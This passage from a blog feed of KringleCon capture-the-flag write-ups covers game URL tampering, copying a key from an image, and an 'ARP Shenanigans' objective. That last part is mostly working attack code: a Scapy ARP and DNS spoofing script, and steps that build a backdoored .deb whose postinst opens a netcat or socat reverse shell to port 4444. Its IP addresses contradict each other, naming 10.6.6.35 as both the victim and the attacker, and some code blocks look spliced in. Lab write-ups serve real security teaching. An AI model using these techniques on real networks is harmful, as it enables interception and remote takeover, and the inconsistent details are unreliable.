class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name3&lt;/span>&lt;span class="o">=&lt;/span>Chris&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health3&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond3&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath3&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday3&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth3&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Particularly interesting is the second parameter: &lt;strong>distance&lt;/strong>. It turns out that if you start the game and then modify this parameter, your position suddenly jumps to the value you entered. The goal is to travel 8000 units of distance, so if you set it to 7999 and then hit &lt;strong>Go&lt;/strong> one more time, you win straight away. This hack is not available on Medium and Hard modes, but for our purposes Easy was enough, as solving it already gives you the hints necessary to progress to the main Objective.&lt;/p>
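&lt;p>The same tampering can be done programmatically. A quick sketch with Python&amp;rsquo;s &lt;code>urllib.parse&lt;/code> (the URL is shortened here to a few of the parameters shown above):&lt;/p>

```python
from urllib.parse import urlsplit, urlunsplit, parse_qs, urlencode

# Shortened version of the in-game URL; the real one carries many more params
url = 'hhc://trail.hhc/store/?difficulty=0&distance=0&money=5000&pace=0'

parts = urlsplit(url)
params = parse_qs(parts.query)
params['distance'] = ['7999']  # one step short of the 8000-unit goal

hacked = urlunsplit(parts._replace(query=urlencode(params, doseq=True)))
print(hacked)
# → hhc://trail.hhc/store/?difficulty=0&distance=7999&money=5000&pace=0
```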
&lt;p>&lt;img src="../images/obj7-trail.png" alt="Holiday Hack Trail">&lt;/p>
&lt;blockquote>
&lt;p>You made it - congrats!
Have you played with the key grinder in my room? Check it out!
It turns out: if you have a good image of a key, you can physically copy it.
Maybe you&amp;rsquo;ll see someone hopping around with a key here on campus.
Sometimes you can find it in the Network tab of the browser console.
Deviant has a great talk on it at this year&amp;rsquo;s Con.
He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.&lt;/p>
&lt;/blockquote>
&lt;p>So the room which hides the entrance to the Steam Tunnels is at the end of the hallway where Minty is, and it seems you will need to do some key crafting. Also mentioned by Minty is a KringleCon
&lt;a href="https://www.youtube.com/watch?v=tbyAc-7Wtv8" target="_blank" rel="noopener">talk&lt;/a> by Deviant Ollam, about physical security around keys and how can one go about copying them.&lt;/p>
&lt;h2 id="bitting-those-keys">Bitting those keys!&lt;/h2>
&lt;p>So once you enter the room, you will notice a small key bitting
&lt;a href="https://key.elfu.org/" target="_blank" rel="noopener">device&lt;/a> on the table, which is useful for crafting keys. You will need it for opening the door to the Steam Tunnels, which hides in the next room, where that character is hopping into:&lt;/p>
&lt;p>&lt;img src="../images/obj7-room.png" alt="Key Room">&lt;/p>
&lt;p>Before you start working on the challenge, be sure to spend a moment appreciating the decoration. It is quite nicely done! When you are ready, consider Minty&amp;rsquo;s hint again: sometimes it&amp;rsquo;s enough to have a good image of a key in order to copy it; physical access is not necessary. If you watched the YouTube video from the hint, you will definitely know what to do.&lt;/p>
&lt;p>The last thing you need to realise is that the character hopping into the room wears a key on his waist. If you open the Developer Tools of your browser and check the source of that object, you will discover that he is &lt;strong>Krampus&lt;/strong>; to see his key properly, just visit:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://2019.kringlecon.com/images/avatars/elves/krampus.png
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once you have the image and get a good look at the key, you can decipher it and find the correct bitting: &lt;strong>122520&lt;/strong>. If you enter this into the bitting machine at &lt;strong>key.elfu.org&lt;/strong>, you will get a key that opens the entrance to the Steam Tunnels. Once you find your way to the end of the tunnels, you will meet &lt;strong>Krampus Hollyfeld&lt;/strong> again, who is the answer to Objective 7.&lt;/p>
&lt;p>&lt;img src="../images/obj7-tunnels.png" alt="Krampus in Tunnel">&lt;/p>
&lt;blockquote>
&lt;p>Hello there! I’m Krampus Hollyfeld.
I maintain the steam tunnels underneath Elf U,
Keeping all the elves warm and jolly.
Though I spend my time in the tunnels and smoke,
In this whole wide world, there&amp;rsquo;s no happier bloke!&lt;/p>
&lt;/blockquote></description></item><item><title>ARP Shenanigans</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective9/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective9/</guid><description>&lt;p>&lt;img src="../images/obj9/objective9.png" alt="Objective9">&lt;/p>
&lt;p>After solving the Tag Generator objective, I head back to the NetWars room to help &lt;code>Alabaster Snowball&lt;/code> with his Scapy Terminal, in exchange for hints:&lt;/p>
&lt;p>&lt;img src="../images/obj9/alabaster-snowball.png" alt="Alabaster Snowball">&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa! You&amp;rsquo;ve got to check out our Scapy Present Packet Prepper!
Please work through the whole thing to make sure it&amp;rsquo;s helpful for our guests!
I made it so that players can help() to see how to get tasks and hints.
When you&amp;rsquo;re done, maybe you can help me with this other issue I&amp;rsquo;m having.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;img src="../images/obj9/scapy-win.png" alt="Terminal Scapy">&lt;/p>
&lt;p>The exact commands I enter can be found
&lt;a href="../files/obj9/scapy.py">HERE&lt;/a>. They are just wonderful for refreshing my Python/Scapy skillz ahead of the main objective. Next, I get some real good hints from &lt;code>Alabaster&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Oh, I see the Scapy Present Packet Prepper has already been completed!
Now you can help me get access to this machine.
It seems that some interloper here at the North Pole has taken control of the host.
We need to regain access to some important documents associated with Kringle Castle.
Maybe we should try a machine-in-the-middle attack?
That could give us access to manipulate DNS responses.
But we&amp;rsquo;ll still need to cook up something to change the HTTP response.
I&amp;rsquo;m sure glad you&amp;rsquo;re here Santa.&lt;/p>
&lt;/blockquote>
&lt;p>With the following hints appearing in the badge:&lt;/p>
&lt;ul>
&lt;li>Jack Frost must have gotten malware on our host at &lt;code>10.6.6.35&lt;/code> because we can no longer access it.&lt;/li>
&lt;li>Try sniffing the eth0 interface using &lt;code>tcpdump -nni eth0&lt;/code> to see if you can view any traffic from that host.&lt;/li>
&lt;li>Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let&amp;rsquo;s return a DNS response resolving the request to our IP.&lt;/li>
&lt;li>The host is performing an ARP request. Perhaps we could do a spoof to perform a &lt;code>machine-in-the-middle&lt;/code> attack. I think we have some sample scapy traffic scripts that could help you in &lt;code>/home/guest/scripts&lt;/code>.&lt;/li>
&lt;li>The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a
&lt;a href="http://www.wannescolman.be/?p=98" target="_blank" rel="noopener">command in a customized .deb file&lt;/a>&lt;/li>
&lt;/ul>
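&lt;p>The customized .deb from the last hint boils down to unpacking an existing package, appending a command to its post-install script, and repacking it under the requested name. Roughly, on the attacker box (the source package filename here is an assumption):&lt;/p>

```shell
# Unpack an existing netcat package, including its DEBIAN control files
dpkg-deb -R netcat-traditional_amd64.deb work/

# Append the reverse-shell command so it runs on installation
# (IP and port match the listener from the diagram below)
echo 'nc 10.6.6.35 4444 -e /bin/bash &' >> work/DEBIAN/postinst

# Repack under the exact filename the malware requests
dpkg-deb -b work/ suriv_amd64.deb
```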
&lt;p>First I spend some time wrapping my head around the overall design of this challenge. I end up crafting the below diagram to help with this:&lt;/p>
&lt;p>&lt;img src="../images/obj9/exploit-overview.png" alt="Exploit Architecture">&lt;/p>
&lt;p>Arrows are explained below:&lt;/p>
&lt;ol>
&lt;li>The victim (right) sends an ARP request every second to find the MAC of IP: &lt;strong>10.6.6.53&lt;/strong> (supposedly a local DNS server)&lt;/li>
&lt;li>As the attacker (left) I spoof the ARP response with my own MAC: &lt;strong>4c:24:57:ab:ed:84&lt;/strong>&lt;/li>
&lt;li>The victim starts sending DNS queries asking for the IP address of: &lt;strong>ftp.osuosl.org&lt;/strong>&lt;/li>
&lt;li>As the attacker I craft spoofed DNS responses to answer these queries with my own IP: &lt;strong>10.6.6.35&lt;/strong>&lt;/li>
&lt;li>The victim tries to fetch resource &lt;code>/pub/jfrost/backdoor/suriv_amd64.deb&lt;/code> via an HTTP request&lt;/li>
&lt;li>As the attacker I have a custom HTTP server that returns a backdoored version of &lt;code>netcat&lt;/code>&lt;/li>
&lt;li>The victim installs this package which starts a reverse shell session via &lt;code>nc 10.6.6.35 4444 -e /bin/bash&lt;/code>&lt;/li>
&lt;li>As the attacker I start a local listener via &lt;code>nc -lvp 4444&lt;/code> to accept the reverse shell connection to exfil the document&lt;/li>
&lt;/ol>
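&lt;p>For steps 6 and 8, stock tooling is almost enough. A sketch of the serving side using Python&amp;rsquo;s built-in &lt;code>http.server&lt;/code> (here bound to an ephemeral localhost port with a placeholder payload; on the real attacker box it would serve the backdoored .deb on port 80):&lt;/p>

```python
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.request

# Recreate the directory layout the malware requests the package from
root = tempfile.mkdtemp()
deb_dir = os.path.join(root, 'pub', 'jfrost', 'backdoor')
os.makedirs(deb_dir)
with open(os.path.join(deb_dir, 'suriv_amd64.deb'), 'wb') as f:
    f.write(b'placeholder for the backdoored netcat package')

class Handler(http.server.SimpleHTTPRequestHandler):
    """Serve files out of the prepared directory tree."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=root, **kwargs)

# Bind an ephemeral port locally; on the real attacker box this is port 80
with socketserver.TCPServer(('127.0.0.1', 0), Handler) as httpd:
    port = httpd.server_address[1]
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    url = f'http://127.0.0.1:{port}/pub/jfrost/backdoor/suriv_amd64.deb'
    with urllib.request.urlopen(url) as resp:
        status, body = resp.status, resp.read()
    httpd.shutdown()

print(status, len(body))
```

Step 8 then needs nothing more than the &lt;code>nc -lvp 4444&lt;/code> listener mentioned above to catch the reverse shell.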
&lt;p>Modifying the provided python scripts to achieve the ARP spoofing is quite straightforward. The DNS part requires a bit more effort, but the provided pcap examples help a lot:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln"> 1&lt;/span>&lt;span class="ch">#!/usr/bin/python3&lt;/span>
&lt;span class="ln"> 2&lt;/span>&lt;span class="kn">from&lt;/span> &lt;span class="nn">scapy.all&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="o">*&lt;/span>
&lt;span class="ln"> 3&lt;/span>&lt;span class="kn">import&lt;/span> &lt;span class="nn">netifaces&lt;/span> &lt;span class="kn">as&lt;/span> &lt;span class="nn">ni&lt;/span>
&lt;span class="ln"> 4&lt;/span>&lt;span class="kn">import&lt;/span> &lt;span class="nn">uuid&lt;/span>
&lt;span class="ln"> 5&lt;/span>
&lt;span class="ln"> 6&lt;/span>&lt;span class="n">ipaddr&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ni&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ifaddresses&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;eth0&amp;#39;&lt;/span>&lt;span class="p">)[&lt;/span>&lt;span class="n">ni&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">AF_INET&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="s1">&amp;#39;addr&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="ln"> 7&lt;/span>&lt;span class="n">macaddr&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;:&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">([&lt;/span>&lt;span class="s1">&amp;#39;{:02x}&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">((&lt;/span>&lt;span class="n">uuid&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">getnode&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">&amp;gt;&amp;gt;&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;amp;&lt;/span> &lt;span class="mh">0xff&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">8&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">8&lt;/span>&lt;span class="p">)][::&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="ln"> 8&lt;/span>&lt;span class="n">spoofed_ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;10.6.6.53&amp;#34;&lt;/span>
&lt;span class="ln"> 9&lt;/span>&lt;span class="n">spoofed_domain&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;ftp.osuosl.org&amp;#39;&lt;/span>
&lt;span class="ln">10&lt;/span>
&lt;span class="ln">11&lt;/span>&lt;span class="k">def&lt;/span> &lt;span class="nf">handle_pkt&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="ln">12&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="ln">13&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="n">ARP&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">packet&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">ARP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">op&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">14&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Spoofed APR response for {spoofed_ip} with own MAC {macaddr}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">15&lt;/span> &lt;span class="n">ether_resp&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Ether&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hwsrc&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nb">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mh">0x806&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="hl">&lt;span class="ln">16&lt;/span> &lt;span class="n">arp_response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ARP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">op&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hwsrc&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hwdst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hwsrc&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">psrc&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">pdst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;10.6.6.35&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;span class="ln">17&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ether_resp&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">arp_response&lt;/span>
&lt;span class="ln">18&lt;/span> &lt;span class="k">else&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">19&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Spoofed DNS response for {spoofed_domain} with own IP {ipaddr}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">20&lt;/span> &lt;span class="n">eth&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Ether&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">Ether&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">21&lt;/span> &lt;span class="n">ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">IP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">IP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">22&lt;/span> &lt;span class="n">udp&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">UDP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dport&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">UDP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sport&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sport&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">UDP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">dport&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">23&lt;/span> &lt;span class="n">dns&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">DNS&lt;/span>&lt;span class="p">(&lt;/span>
&lt;span class="hl">&lt;span class="ln">24&lt;/span> &lt;span class="nb">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">DNS&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">id&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qdcount&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ancount&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qr&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ra&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">DNS&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qd&lt;/span>&lt;span class="p">,&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln">25&lt;/span> &lt;span class="n">an&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">DNSRR&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rrname&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;ftp.osuosl.org&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nb">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;A&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rclass&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;IN&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rdata&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">ipaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ttl&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">82159&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;span class="ln">26&lt;/span> &lt;span class="p">)&lt;/span>
&lt;span class="ln">27&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">eth&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">ip&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">udp&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">dns&lt;/span>
&lt;span class="ln">28&lt;/span> &lt;span class="n">sendp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">response&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">iface&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;eth0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">verbose&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">29&lt;/span>
&lt;span class="ln">30&lt;/span>&lt;span class="k">def&lt;/span> &lt;span class="nf">main&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="ln">31&lt;/span> &lt;span class="n">berkeley_packet_filter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;(&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34; and &amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">([&lt;/span>
&lt;span class="ln">32&lt;/span> &lt;span class="s2">&amp;#34;udp dst port 53&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;udp[10] &amp;amp; 0x80 = 0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;dst host {}&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="s2">&amp;#34;ether dst host {}&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">33&lt;/span> &lt;span class="p">])&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;) or (arp[6:2] = 1)&amp;#34;&lt;/span>
&lt;span class="ln">34&lt;/span> &lt;span class="n">sniff&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">filter&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">berkeley_packet_filter&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">prn&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">handle_pkt&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">store&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">iface&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;eth0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">count&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">35&lt;/span>
&lt;span class="ln">36&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s2">&amp;#34;__main__&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">37&lt;/span> &lt;span class="n">main&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, following this
&lt;a href="http://www.wannescolman.be/?p=98" target="_blank" rel="noopener">guide&lt;/a>, I create the &lt;strong>backdoored&lt;/strong> .deb package that will be served by my rogue web server. It is rather straightforward, as I can reuse one of the existing packages already present on the terminal.&lt;/p>
&lt;p>First, I get it working via &lt;code>netcat&lt;/code>, but then switch to &lt;code>socat&lt;/code> because it can establish a full-featured &lt;strong>TTY&lt;/strong> instead of merely echoing back the text output of typed commands.
&lt;a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" target="_blank" rel="noopener">This post&lt;/a> offers great tips on setting up reverse shells with both netcat and socat!&lt;/p>
&lt;p>To make the process repeatable, I craft the script below, which takes care of every step: creating the backdoored package, launching the ARP &amp;amp; DNS spoofing script, starting the web server and, finally, running the &lt;code>socat&lt;/code> listener that accepts the reverse shell:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="ln"> 1&lt;/span>dpkg -x debs/socat_1.7.3.3-2_amd64.deb socat
&lt;span class="ln"> 2&lt;/span>ar -x debs/socat_1.7.3.3-2_amd64.deb
&lt;span class="ln"> 3&lt;/span>tar -xf control.tar.xz
&lt;span class="ln"> 4&lt;/span>rm control.tar.xz data.tar.xz debian-binary md5sums
&lt;span class="ln"> 5&lt;/span>
&lt;span class="ln"> 6&lt;/span>mkdir socat/DEBIAN
&lt;span class="ln"> 7&lt;/span>mv control socat/DEBIAN/
&lt;span class="ln"> 8&lt;/span>touch socat/DEBIAN/postinst
&lt;span class="ln"> 9&lt;/span>chmod &lt;span class="m">775&lt;/span> socat/DEBIAN/postinst
&lt;span class="ln">10&lt;/span>&lt;span class="nv">LOCAL_IP&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="sb">`&lt;/span>ifconfig &lt;span class="p">|&lt;/span> grep -Eo &lt;span class="s1">&amp;#39;inet (addr:)?([0-9]*\.){3}[0-9]*&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep -Eo &lt;span class="s1">&amp;#39;([0-9]*\.){3}[0-9]*&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep -v &lt;span class="s1">&amp;#39;127.0.0.1&amp;#39;&lt;/span>&lt;span class="sb">`&lt;/span>
&lt;span class="ln">11&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;socat exec:&amp;#39;bash -li&amp;#39;,pty,stderr,setsid,sigint,sane tcp:&lt;/span>&lt;span class="si">${&lt;/span>&lt;span class="nv">LOCAL_IP&lt;/span>&lt;span class="si">}&lt;/span>&lt;span class="s2">:4444&amp;#34;&lt;/span> &amp;gt;&amp;gt; socat/DEBIAN/postinst
&lt;span class="hl">&lt;span class="ln">12&lt;/span>dpkg-deb --build ./socat/
&lt;/span>&lt;span class="hl">&lt;span class="ln">13&lt;/span>
&lt;/span>&lt;span class="ln">14&lt;/span>mkdir -p pub/jfrost/backdoor
&lt;span class="ln">15&lt;/span>mv socat.deb pub/jfrost/backdoor/suriv_amd64.deb
&lt;span class="ln">16&lt;/span>
&lt;span class="ln">17&lt;/span>python3 -m http.server &lt;span class="m">80&lt;/span> &lt;span class="p">&amp;amp;&lt;/span>&amp;gt;/dev/null &lt;span class="p">&amp;amp;&lt;/span> python3 spoof.py &lt;span class="p">&amp;amp;&lt;/span>&amp;gt;/dev/null &lt;span class="p">&amp;amp;&lt;/span>
&lt;span class="ln">18&lt;/span>
&lt;span class="ln">19&lt;/span>socat file:&lt;span class="sb">`&lt;/span>tty&lt;span class="sb">`&lt;/span>,raw,echo&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span> tcp-listen:4444
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, I obtain a full-featured TTY reverse shell and open the txt file to get the answer:&lt;/p>
&lt;p>&lt;img src="../images/obj9/recusal.png" alt="Recusal-Solution">&lt;/p>
